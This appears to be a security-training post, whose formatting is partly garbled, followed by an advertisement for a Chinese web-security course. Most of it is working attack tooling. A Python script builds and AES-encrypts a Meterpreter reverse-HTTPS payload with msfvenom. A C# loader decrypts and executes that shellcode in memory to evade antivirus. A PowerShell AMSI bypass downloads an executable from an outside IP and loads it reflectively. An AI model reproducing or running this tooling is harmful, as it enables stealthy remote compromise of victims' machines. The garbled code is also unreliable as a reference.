#!/usr/bin/env python3import array, base64, random, stringfrom Crypto.Cipher import AESfrom hashlib import sha256import argparse, subprocess,osdef main():  args = parse_args()  lhost = args.  lport lhost= args.  key lport= args.  keyif not key:    key = get_random_string(32)  payload = args.  method payload= args.  methodformat = args.format ''' generate msfvenom payload '''  print("[+] Generating MSFVENOM payload...")  result = subprocess.run(['msfvenom',    '-p', payload,    'LPORT=' + lport,    'LHOST=' + lhost,#    '-b', '\\x00',    '-f', 'raw',    '-o', './msf.bin'],    capture_output=False)  f= open("./msf.bin", "rb")  buf = f.read()  f.close() print("[+] key and payload will be written to key.b64 and payload.b64") ''' encrypt the payload '''  print("[+] Encrypting the payload, key=" + key + "...")  hkey = hash_key(key)  encrypted = encrypt(hkey, hkey[:16], buf)  b64 = base64.b64encode(encrypted)  f= open("./key.b64", "w")  f.write(key)  f.close()  f= open("./payload.b64", "w")  f.write(b64.decode('utf-8'))  f.close() if format == "b64":    ''' base64 output '''    print("[+] Base64 output:")    print(b64.decode('utf-8'))    print("\n[+] Have a nice day!")    return  if format == "c":    ''' c output '''    print("[+] C output:")    hex_string = 'unsigned char payload[] ={0x';    hex = '0x'.join('{:02x},'.format(x) for x in encrypted)    hex_string = hex_string + hex[:-1] + "};"    print(hex_string)    print("\n[+] Have a nice day!")    return
def encrypt(key,iv,plaintext):  key_length = len(key)  if (key_length >= 32):    k = key[:32]  elif (key_length >= 24):    k = key[:24]  else:    k = key[:16]  aes= AES.new(k, AES.MODE_CBC, iv)  pad_text = pad(plaintext, 16)  return aes.encrypt(pad_text)
def hash_key(key):  h = ''  for c in key:    h += hex(ord(c)).replace("0x", "")  h = bytes.fromhex(h)  hashed = sha256(h).digest()  returnhasheddef pad(data, block_size):  padding_size = (block_size - len(data)) %   block_sizeif padding_size == 0:    padding_size =  padding  block_size= (bytes([padding_size]) * padding_size)  return data +paddingdef parse_args():  parser = argparse.ArgumentParser()  parser.add_argument("-l", "--lport", default="0.0.0.0", type=str,    help="The local port that msfconsole is listening on.")  parser.add_argument("-i", "--lhost", default="443", type=str,      help="The local host that msfconsole is listening on.")  parser.add_argument("-p", "--payload", default = "windows/x64/meterpreter/reverse_https", type=str,    help="The payload to generate in msfvenom.")  parser.add_argument("-m", "--method", default="thread", type=str,    help="The method to use: thread/delegate.")  parser.add_argument("-k", "--key", default="", type=str,    help="The encryption key (32 chars).")  parser
.add_argument("-f", "--format", default="b64", type=str,    help="The format to output.") return parser.parse_args()
def get_random_string(length):  letters = string.ascii_letters + string.  result_str digits= ''.join(random.choice(letters) for i in range(length))  returnresult_strif __name__ == '__main__':  main()

meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-f FORMAT]

python3 meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.168.11.2 -l 443 -f b64

using System;using System.Runtime.InteropServices;using System.Security.Cryptography;using System.Text;using System.IO;namespaceProcessInjection{    class Program    {        public enum Protection        {            PAGE_NOACCESS = 0x01,            PAGE_READONLY = 0x02,            PAGE_READWRITE = 0x04,            PAGE_WRITECOPY = 0x08,            PAGE_EXECUTE = 0x10,            PAGE_EXECUTE_READ = 0x20,            PAGE_EXECUTE_READWRITE = 0x40,            PAGE_EXECUTE_WRITECOPY = 0x80,            PAGE_GUARD = 0x100,            PAGE_NOCACHE = 0x200,            PAGE_WRITECOMBINE = 0x400        }       [DllImport("kernel32.dll")]        static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);       [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);       private delegate Int32 ShellcodeDelegate();       static void Main(string[] args)        {            Shellcode();        }       static void Shellcode()        {            // attempt heuristics/behaviour bypass            IntPtr mem = VirtualAllocExNuma(System.Diagnostics.Process.GetCurrentProcess().Handle, IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);            if (mem == null)            {                return;            }           // decrypt the base64 payload - change these to your own encrypted payload and key            string payload = "6LII6OYoVux8aZ+bY/9SiwDKLvHDFMSQYnr21YRAEe5m6rEjKxqnqHrjpp7X6XZBbrQcwqLnK7K4lXE1xv7PkLP0zPbQujfUxRDlMOKmvoH4DJySgcbBTwGvIey/4EIV4UZY6NCRSu1BVl9ztwAiSltAdoXt68JPFvm4W/V58crjsD8L2InuEmTf7QaGx43CbfBQPsG11KI0ExWpBQ9bdFaTQR1A8CPbLJ+Lx1gjJyDEKoOORrdP+iKdVRgox8kWqUlvEKOg90XienikjaZpeq4npmtg5Cwe0CMBkX688PFxFYtW32up38oFQAUIJ02mhKSHJMqUKbmZ/CHdoh5Vaheuq0XONzmYJ6H4tklqyeET8AszkrwxDebyPDpqnTjuCM4Gamynk0HAn5N2rH4S1KvrTKSTr7kTOa0okDPaYr9cIHtFbYmWW9wgDixkfkiJxD/Kx98F/urzgmnoxxSHKwVPUGQNqJ1vzB04gE0mPLJy1TyaNzgLxvIJRKLHDmpExH2Hd0ieCA8kp2Qwf6yVrM2aeFxChoDEVsHAB97E63O2eM1i+uFmSsR4Ti5P69WfvRinUb6VRLELQLdyg3BKlipcJiabchviL53J9Adqea3P4pAjtjbEELd1mMIA++dxhihcNDZ6zPPswv+M10DyWExWTc1NxJzUFogNYrhj/BumwMR95LA5m4wl8JvVUCGc0OCLPaMUHhdenCJwwFtBrW87lePC9BzFgxJ8gS5eSUF1CMp3hjBdSIE4fp/TQShNrxwrQWXt4gZKcqTkAnt3pdfFE7qkoF8YWormRMxCdVaofwtjow3hJB8+iW01puVl/5GIspKz0ligMoZUnxCRvY/kiqng3z21iO6LrFO2em5ts7/Oh6H4wUaAHFw+/L7/EEN+fR7stKR+kPHsholU5SU/ofCxyGWIvWno647MyNXxRZvbOdIxTLz2c0mJzV+sAiVXDK+B3GbNw6vjQFNHtI2LwW2Fm/uaUyt8qm1zQIJjZi210RTIr9l31nlcwrtH36YhnW/oQcBLBANbmT+MwYMEaU+gCr2Gi+vMmTE828GWwYbJ5rBR4gGT7eP1WP6i";//这里是生成的payload            string key = "vzj2WM9NY3oQ4U1KOJF7o15rXdj3YxNn";//这里是生成的key            byte[] buf = Decrypt(key, payload);                       unsafe{                fixed (byte* ptr = buf)                {                    // set the memory as executable and execute the function pointer (as a delegate)                    IntPtr memoryAddress = (IntPtr)ptr;                    VirtualProtect(memoryAddress, (UIntPtr)buf.Length, (UInt32)Protection.PAGE_EXECUTE_READWRITE, out uint lpfOldProtect);                   ShellcodeDelegate func = (ShellcodeDelegate)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(ShellcodeDelegate));                    func();                }            }        }       private static byte[] Decrypt(string key, string aes_base64)        {            byte[] tempKey = Encoding.ASCII.GetBytes(key);            tempKey = SHA256.Create().ComputeHash(tempKey);            byte[] data = Convert.FromBase64String(aes_base64);           // decrypt data            Aes aes = new AesManaged();            aes.Mode = CipherMode.CBC;            aes.Padding = PaddingMode.PKCS7;            ICryptoTransform dec = aes.CreateDecryptor(tempKey, SubArray(tempKey, 16));           using (MemoryStream msDecrypt = new MemoryStream())            {                using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, dec, CryptoStreamMode.Write))                {                    csDecrypt.Write(data, 0, data.Length);                   return msDecrypt.ToArray();                }            }        }       static byte[] SubArray(byte[] a, int length)        {            byte[] b = new byte[length];            for (int i = 0; i < length; i++)            {                b[i] = a[i];            }            return b;        }    }}

# AMSI bypass$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)$bytes = (Invoke-WebRequest "http://192.168.11.2/demo.exe").Content;$assembly = [System.Reflection.Assembly]::Load($bytes);$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('', '')));

最新课程目录3.0版

每期班定价2499，新年价：1999（前30名送399元Web安全知识星球名额）

每个报名学员都可享受一次后续任意一期课免费重听权益，一次没学懂就再来一遍，后续培训可任选一期来听。请有意参加培训的学员抓紧报名！

凡是MS08067旗下任意星球学员或其他培训课程学员，可享内部VIP价1799；

支持支付宝、信用卡、花呗分期，对公转账，可开发票！

知识星球是什么？

上课时间

开课时间1月27号，每周二天课，共8周21节课（42小时）
周四：19:30-21:30
周六：14:00-18:00如果无法准时参加直播课程，在线培训的每节课程都会被录制成视频上传到学员区，可随时下载观看。

上课方式

培训采用在线直播+随堂录播+配套教材+配套星球+课后作业的形式，无需等待，报名后立即进入“Web安全”星球开始预习。
 

报名咨询请联系小客服

扫描下方二维码加入星球学习

加入后邀请你进入内部微信群，内部微信群永久有效！